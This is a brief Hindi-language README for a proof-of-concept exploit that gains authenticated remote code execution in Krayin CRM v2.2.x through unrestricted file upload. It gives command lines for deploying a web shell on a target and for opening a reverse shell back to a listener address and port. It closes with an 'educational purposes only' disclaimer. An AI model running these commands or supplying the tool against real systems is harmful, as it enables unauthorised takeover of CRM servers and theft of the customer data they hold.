
Krayin CRM v2.2.x में unrestricted file upload के माध्यम से authenticated remote code execution के लिए Proof-of-concept exploit, जो web shell और reverse shell payloads का समर्थन करता है।
Krayin CRM v2.2.x में एक गंभीर भेद्यता के लिए PoC स्क्रिप्ट, जो असीमित फ़ाइल अपलोड के माध्यम से प्रमाणित RCE की अनुमति देती है।
# वेब शेल
python3 exploit.py -u http://target.com -e [email protected] -p password123
# रिवर्स शेल
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444
केवल शैक्षिक उद्देश्यों के लिए।